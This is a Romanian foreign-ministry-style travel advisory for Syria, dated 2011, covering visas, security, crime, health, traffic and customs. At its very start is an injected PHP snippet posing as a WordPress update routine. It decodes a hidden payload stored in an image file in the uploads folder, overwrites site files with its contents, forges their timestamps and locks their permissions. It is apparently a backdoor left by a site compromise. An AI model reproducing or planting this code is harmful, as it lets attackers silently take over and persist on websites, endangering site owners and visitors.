$wp_update_file="/home/shuffles/public_html/wp-content/uploads/2023/05/0506412536.tiff"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Siria – O noua atitudine

Siria

Ultima actualizare:

18 mai 2011

Condiţii de intrare şi regim de şedere

Intrarea în Siria se face pe baza vizei de intrare eliberată de ambasadele siriene din străinătate. La punctele de frontieră, viza de intrare se eliberează numai cu titlu de excepţie, în cazuri bine justificate. Orice şedere mai mare de zece zile se înregistrează la poliţia departamentală, iar orice ieşire din Siria, după o şedere mai mare de 10 zile se aprobă de poliţia locală (se aplică o ştampilă cu aprobarea de ieşire din ţară). Durata maximă a unei vize este de şase luni (inclusiv vizele diplomatice) dar acestea pot fi prelungite în ţară, după un interviu cu reprezentanţii Ministerului de Interne local, pentru o nouă perioadă de şase luni.

Posesorii vizelor turistice sau de vizită nu pot desfăşura activităţi lucrative. Avizul pentru acordarea vizei de muncă se acordă de Ministerul Muncii numai firmelor locale care angajează forţă de muncă străină. În scopul protejării forţei de muncă internă, acordarea vizelor de muncă pentru străini este limitată de lege. Persoanelor care primesc dreptul şi viza de muncă li se eliberează un permis de şedere valabil un an.

Cetăţenii străini căsătoriţi cu cetăţeni sirieni, care domiciliază în Siria, primesc un permis de şedere cu valabilitatea egală cu cea a paşaportului străin deţinut. Este refuzată intrarea în Siria a persoanelor care deţin o viză israeliană în paşaport. De asemenea, este interzis accesul purtătorilor virusului SIDA. Orice probleme în materie de vize trebuie adresate reprezentanţilor teritoriali ai Ministerului de Interne.

Pentru verificarea condiţiilor particulare de intrare prevăzute de legislaţia naţională siriană, recomandăm consultarea informaţiilor oficiale furnizate de autorităţile siriene:

  • Ambasada Siriei în România (Bd. Lascăr Catargiu nr. 50, sector 1, Bucureşti; Tel: 319-2467; Fax: 312-9554; Email: syrambro@yahoo.com)

Ministerul Afacerilor Externe recomandă cetăţenilor români care intenţionează să rămână pentru o perioadă îndelungată pe teritoriul acestui stat să se adreseze misiunii diplomatice a României şi să îşi anunţe prezenţa în regiune, comunicând coordonatele personale pentru a putea fi contactaţi în situaţii de urgenţă.


Ameninţări teroriste

În Siria, ca în majoritatea statelor zonei, există riscul producerii de atentate teroriste. În anii 2004, 2006 şi 2008 au avut loc atentate cu maşini capcană, produse în capitala Damasc.

Începand din luna martie 2011, in Siria s-a intensificat riscul producerii unor evenimente violente, inclusiv armate, cauzate de confruntările dintre grupări extremiste sau infracţionale şi forţele de securitate.

Cetăţenilor români care călătoresc în Siria li se recomandă să urmărească în mod constant evoluţia stării de securitate, să respecte atenţionările şi recomandările autorităţilor locale,  să acceseze periodic pagina web a Ministerului român al Afacerilor Externe (www.mae.ro) si să păstreze un contact permanent cu Ambasada României.

Siguranţă şi criminalitate

Infracţionalitatea este limitată, Siria fiind o ţară relativ sigură din acest punct de vedere.

Pentru siguranţa dumneavoastră recomandăm:

  • Evitaţi circulaţia pe timp de noapte, locurile aglomerate, demonstraţiile şi deplasarea în zone izolate ale ţării.
  • Păstraţi în locuri sigure documentele şi valorile personale, biletele de călătorie, banii, cărţile de credit şi nu le expuneţi în mod vizibil asupra dumneavoastră sau în maşini.
  • Respectaţi tradiţiile şi obiceiurile locale. Persoanele de sex feminin sunt sfătuite să adopte o ţinută şi un comportament decent în public.
  • Uşile si geamurile de la autovehicule trebuie ţinute închise.
  • Să respecte cu stricteţe anunţurile şi recomandările autorităţilor locale.
  • În majoritatea localurilor nu se servesc băuturi alcoolice, iar consumul acestora pe stradă nu este recomandat.

În Siria, crimele şi delictele legate de droguri sunt foarte sever pedepsite. Persoanele acuzate de contrabandă, fabricarea sau cultivarea de stupefiante riscă pedeapsa capitală, închisoare pe viaţă sau o pedeapsă de cel puţin 20 ani de închisoare. Incitarea la consumul de droguri este pedepsită cu 10 ani de închisoare, iar consumul de stupefiante cu 3 ani. Violul este pedepsit cu moartea.

Evitaţi schimbul de valută pe stradă sau în locuri neautorizate. Schimbul de valută se poate face numai la birourile de schimb valutar, la bănci sau la hoteluri. Evitaţi fotografierea obiectivelor guvernamentale şi militare.

În cazul unor incidente care afectează siguranţa persoanei sau a bunurilor, se recomandă contactarea celui mai apropiat birou al poliţiei. În cazul pierderii paşaportului românesc, se recomandă sesizarea atât a biroului local de poliţie, cât şi a Ambasadei României, care poate acorda asistenţa consulară în condiţiile prevăzute de lege.

Sistemul medical

Asigurările medicale nu sunt obligatorii pentru străinii care călătoresc în Siria.

În general, asigurările medicale încheiate în străinătate nu sunt recunoscute de autorităţile siriene. Pentru servicii medicale se poate apela numai la spitalele particulare, care practică tarife europene (între 400 $ -1000 $ ziua de spitalizare). Spitalele de stat nu primesc străini.

În caz de evenimente rutiere, accidentaţii sunt transportaţi la secţiile de urgenţă ale spitalelor teritoriale de stat, după care sunt transferaţi la spitale particulare, dacă sunt necesare câteva zile de spitalizare. Nu sunt necesare vaccinuri pentru deplasarea în Siria.

Condiţii privind traficul auto

  • Circulaţia auto

Asigurările obligatorii pentru autoturisme sunt solicitate prin lege.

Conducătorii auto sirieni nu respectă regulile de circulaţie cunoscute in Europa, semnalizarea schimbării direcţiei de mers se efectuează foarte rar şi eventual cu mâna, în general nu se acordă prioritate, iar oprirea mijloacelor de transport în comun şi a taxiurilor se efectuează fără reguli stabilite, de obicei în locurile solicitate de clienţi şi fără o semnalizare prealabilă.

Conducătorii auto străini trebuie să se abţină de la a reproşa partenerilor de trafic sirieni nerespectarea regulilor de circulaţie şi să manifeste calm şi rabdare în orice situaţie.

  • Starea drumurilor

Siria dispune de o reţea extinsă de şosele şi autostrăzi, suplinind slaba reprezentare a traficului feroviar. Din această cauză, pe şoselele siriene prezenţa mijloacelor de transport mărfuri este foarte des întâlnită.

  • Limitele de viteză admise

– 60 km/h în localităţi

– 100 km/h pe autostrăzi

Deşi există limite de viteză, acestea nu se respectă.

  • Parcarea

Parcarea trebuie efectuată în spaţii semnalizate, altfel există riscul ridicării maşinii de către poliţia municipală. Recuperarea autovehiculului este un proces anevoios, care presupune plata unei amenzi şi a costurilor aferente ridicării şi parcării provizorii în spaţiile municipalităţii, în total aproximativ 150 USD.

Utilizarea cărţilor de credit

Numărul magazinelor şi al instituţiilor locale care accepta cărţile de credit este redus.

Reglementări vamale

Reglementările vamale siriene nu impun restricţii cantitative pentru diferite categorii de bunuri. Se poate intra cu orice sumă de bani, dar aceasta trebuie declarată. La ieşirea din ţară, pentru sumele mai mari de 5000 Euro trebuie dovedită provenienţa.

By o9admin